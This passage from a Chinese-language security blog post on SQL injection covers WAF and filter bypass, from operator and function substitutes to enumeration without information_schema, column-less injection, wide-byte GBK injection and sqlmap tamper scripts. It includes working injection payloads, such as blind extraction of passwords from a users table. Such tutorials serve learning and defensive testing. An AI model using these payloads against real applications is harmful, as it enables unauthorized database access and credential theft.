<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql">如果等号被过滤了我们可以用 <span class="hljs-keyword">like</span> 代替 （<span class="hljs-keyword">and</span> <span class="hljs-number">1</span>like1）<br>使用<span class="hljs-keyword">like</span> 、rlike 、regexp 或者 使用<span class="hljs-operator">&lt;</span> 或者 <span class="hljs-operator">&gt;</span><br><span class="hljs-comment">-- 大小于号都没了就用between、greatest()、least()</span><br></code></pre></td></tr></table></figure>

<p>（4）or and xor not</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span><span class="hljs-operator">=</span><span class="hljs-operator">&amp;&amp;</span>  <span class="hljs-keyword">or</span><span class="hljs-operator">=</span><span class="hljs-operator">||</span>   xor<span class="hljs-operator">=</span><span class="hljs-operator">|</span>   <span class="hljs-keyword">not</span><span class="hljs-operator">=</span><span class="hljs-operator">!</span> <span class="hljs-comment">-- 用管道符</span><br></code></pre></td></tr></table></figure>



<h4 id="3-寻找等价函数"><a href="#3-寻找等价函数" class="headerlink" title="3.寻找等价函数"></a>3.寻找等价函数</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs sql">hex()、bin() <span class="hljs-operator">=</span><span class="hljs-operator">=</span><span class="hljs-operator">&gt;</span> ascii() <br>sleep() <span class="hljs-operator">=</span><span class="hljs-operator">=</span><span class="hljs-operator">&gt;</span> benchmark() <br>concat_ws()<span class="hljs-operator">=</span><span class="hljs-operator">=</span><span class="hljs-operator">&gt;</span>group_concat() <br>mid()、substr() <span class="hljs-operator">=</span><span class="hljs-operator">=</span><span class="hljs-operator">&gt;</span> <span class="hljs-built_in">substring</span>() <br>@<span class="hljs-variable">@user</span> <span class="hljs-operator">=</span><span class="hljs-operator">=</span><span class="hljs-operator">&gt;</span> <span class="hljs-keyword">user</span>() <br>@<span class="hljs-variable">@datadir</span> <span class="hljs-operator">=</span><span class="hljs-operator">=</span><span class="hljs-operator">&gt;</span> datadir() <br>举例：<span class="hljs-built_in">substring</span>()和substr()无法使用时：?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-operator">+</span><span class="hljs-keyword">and</span><span class="hljs-operator">+</span>ascii(<span class="hljs-built_in">lower</span>(mid((<span class="hljs-keyword">select</span><span class="hljs-operator">+</span>pwd<span class="hljs-operator">+</span><span class="hljs-keyword">from</span><span class="hljs-operator">+</span>users<span class="hljs-operator">+</span>limit<span class="hljs-operator">+</span><span class="hljs-number">1</span>,<span class="hljs-number">1</span>),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>)))<span class="hljs-operator">=</span><span class="hljs-number">74</span>　 <br>或者： substr((<span class="hljs-keyword">select</span> <span class="hljs-string">&#x27;password&#x27;</span>),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-number">0x70</span> <br>strcmp(<span class="hljs-keyword">left</span>(<span class="hljs-string">&#x27;password&#x27;</span>,<span class="hljs-number">1</span>), <span class="hljs-number">0x69</span>) <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <br>strcmp(<span class="hljs-keyword">left</span>(<span class="hljs-string">&#x27;password&#x27;</span>,<span class="hljs-number">1</span>), <span class="hljs-number">0x70</span>) <span class="hljs-operator">=</span> <span class="hljs-number">0</span> <br>strcmp(<span class="hljs-keyword">left</span>(<span class="hljs-string">&#x27;password&#x27;</span>,<span class="hljs-number">1</span>), <span class="hljs-number">0x71</span>) <span class="hljs-operator">=</span> <span class="hljs-number">-1</span><br><span class="hljs-keyword">into</span> <span class="hljs-variable">@a</span>,<span class="hljs-variable">@b</span>  <span class="hljs-operator">=</span><span class="hljs-operator">=</span><span class="hljs-operator">&gt;</span> <span class="hljs-keyword">order</span> <span class="hljs-keyword">by</span><br></code></pre></td></tr></table></figure>

<p>​	infromation_schema被过滤的话：</p>
<ul>
<li><h4 id="MySQL-5-6-的新特性"><a href="#MySQL-5-6-的新特性" class="headerlink" title="MySQL 5.6 的新特性"></a>MySQL 5.6 的新特性</h4><p>在 MySQL 5.5.x 之后的版本，MySQL 开始将 innoDB 引擎作为 MySQL 的默认引擎，因此从 MySQL 5.6.x 版本开始，MySQL 在数据库中添加了两张表，<code>innodb_index_stats</code> 和 <code>innodb_table_stats</code>，两张表都会存储数据库和对应的数据表。</p>
<p>因此，从 MySQL 5.6.x 开始，有了取代 <code>information_schema</code> 的表名查询方式，如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> table_name <span class="hljs-keyword">from</span> mysql.innodb_index_stats <span class="hljs-keyword">where</span> database_name<span class="hljs-operator">=</span>database();<br><span class="hljs-keyword">select</span> table_name <span class="hljs-keyword">from</span> mysql.innodb_table_stats <span class="hljs-keyword">where</span> database_name<span class="hljs-operator">=</span>database();<br></code></pre></td></tr></table></figure>


</li>
<li><h4 id="MySQL-5-7-的新特性"><a href="#MySQL-5-7-的新特性" class="headerlink" title="MySQL 5.7 的新特性"></a>MySQL 5.7 的新特性</h4><p>由于 <code>performance_schema</code> 过于发杂，所以 MySQL 在 5.7 版本中新增了 <code>Sys schema</code> 视图，基础数据来自于 <code>performance_chema</code> 和 <code>information_schema</code> 两个库。</p>
<p>而其中有这样一个视图，<code>schema_table_statistics_with_buffer,x$schema_table_statistics_with_buffer</code>，我们可以翻阅官方文档对其的解释</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> table_name <span class="hljs-keyword">from</span> sys.schema_table_statistics_with_buffer <span class="hljs-keyword">where</span> table_schema<span class="hljs-operator">=</span>database();<br><span class="hljs-keyword">select</span> table_name <span class="hljs-keyword">from</span> sys.x$schema_table_statistics_with_buffer <span class="hljs-keyword">where</span> table_schema<span class="hljs-operator">=</span>database();<br></code></pre></td></tr></table></figure>
</li>
<li><h3 id="无列名注入"><a href="#无列名注入" class="headerlink" title="无列名注入"></a>无列名注入</h3><p>在因为 <code>information_schema</code> 被过滤或其他原因无法获得字段名的时候，可以通过别名的方式绕过获取<strong>字段名</strong>的这一步骤</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> a,b <span class="hljs-keyword">from</span> (<span class="hljs-keyword">select</span> <span class="hljs-number">1</span> <span class="hljs-keyword">as</span> a, <span class="hljs-number">2</span> <span class="hljs-keyword">as</span> b <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> users)x;<br></code></pre></td></tr></table></figure></li>
</ul>
<h4 id="4-非常规"><a href="#4-非常规" class="headerlink" title="4. 非常规"></a>4. 非常规</h4><p>​	比如脏数据溢出绕过，pipline绕过，分块传输绕过，白名单绕过，宽字节，多参数， 。</p>
<p>​	宽字节注入：</p>
<p>​	有些时候系统使用如下代码进行转义（例如在 PHP 中）：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">$username <span class="hljs-operator">=</span> addslashes($_GET[<span class="hljs-string">&#x27;username&#x27;</span>]); <span class="hljs-operator">/</span><span class="hljs-operator">/</span> 会将 <span class="hljs-string">&#x27; 变成 \&#x27;</span><br></code></pre></td></tr></table></figure>

<p>​	但是攻击者输入：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-operator">%</span>bf<span class="hljs-operator">%</span><span class="hljs-number">27</span> <span class="hljs-keyword">OR</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>

<p>​	在GBK环境下：</p>
<ul>
<li><code>%bf%27</code> 会被解码为一个合法汉字（因为 <code>%bf</code> 是多字节编码中的前导字节）。</li>
<li><code>addslashes</code> 不会将 <code>%bf</code> 和 <code>%27</code> 识别为单个字符，而只是对 <code>&#39;</code> 做了转义。</li>
<li>数据库解析时 <code>%bf%27</code> 被解释为：汉字 + <code>&#39;</code>，从而使 <code>&#39;</code> 落单，形成注入点。</li>
</ul>
<p>​	这些骚操作这里引用一篇文章</p>
<p>​	<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/268428">sql注入绕WAF的N种姿势</a></p>
<p>​	<a target="_blank" rel="noopener" href="https://blog.csdn.net/l1028386804/article/details/85869703">渗透之——SQL注入绕过技术总结</a></p>
<p>​	<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/261524.html">珂技系列之一篇就够了——mysql注入</a></p>
<h2 id="自动化：sqlmap"><a href="#自动化：sqlmap" class="headerlink" title="自动化：sqlmap"></a>自动化：sqlmap</h2><p>​	<a target="_blank" rel="noopener" href="https://blog.csdn.net/shanguicsdn111/article/details/142088764">SQLmap使用教程</a><img src="/2025/10/23/SQLI/80d2a4ffaa0cb7d7d1db82770ccdf1cf.png" srcset="/img/loading.gif" lazyload></p>
<p>这里着重提一下，用sqlmap绕过WAF</p>
<p>SQLmap内置了很多绕过脚本，在 &#x2F;usr&#x2F;share&#x2F;sqlmap&#x2F;tamper&#x2F; 目录下：</p>
<p><img src="/2025/10/23/SQLI/image-20251024195214666.png" srcset="/img/loading.gif" lazyload></p>
<p>脚本按照用途命名，比如 space2comment.py 是指，用&#x2F;**&#x2F;代替空格。</p>
<p>当然，你也可以根据内置脚本格式，自己定义绕过脚本。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/web%E5%AE%89%E5%85%A8%E4%B8%93%E9%A2%98/" class="category-chain-item">web安全专题</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>SQLI</div>
      <div>https://i4g5d.github.io/2025/10/23/SQLI/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>i4G5d</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年10月23日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/10/28/HTTP%E4%B8%BB%E6%9C%BA%E5%A4%B4%E6%94%BB%E5%87%BB/" title="HTTP请求头攻击">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">HTTP请求头攻击</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/10/19/web-cache2/" title="web缓存投毒">
                        <span class="hidden-mobile">web缓存投毒</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
